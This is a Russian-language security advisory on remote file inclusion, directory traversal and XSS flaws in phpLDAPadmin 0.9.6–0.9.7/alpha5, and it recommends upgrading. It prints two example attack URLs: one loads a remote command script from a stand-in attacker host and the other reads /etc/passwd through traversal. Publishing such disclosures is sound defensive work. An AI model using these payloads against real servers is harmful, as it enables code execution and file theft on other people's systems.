Security Lab

PHP инклюдинг в phpLDAPadmin

Дата публикации:01.09.2005
Дата изменения:24.03.2009
Всего просмотров:2149
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: CVE-2005-2792
CVE-2005-2654
CVE-2005-2793
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: phpLDAPadmin 0.x
Уязвимые версии: phpLDAPadmin 0.9.6 - 0.9.7/alpha5

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю произвести XSS нападение и выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера.

Уязвимость позволяет удаленному пользователю с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример:

http://[target]/[path]/phpldapadmin/welcome.php?
custom_welcome_page=http ://[evil_site]/cmd.gif

Удаленный пользователь может просмотреть произвольные файлы на системе с помощью символов обхода каталога. Пример:

http://[target]/[path]/phpldapadmin/welcome.php?
custom_welcome_page=../../../../../../../../etc/passwd

Удаленный пользователь может также выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

URL производителя: phpldapadmin.sourceforge.net

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure, remote code execution, cross site scripting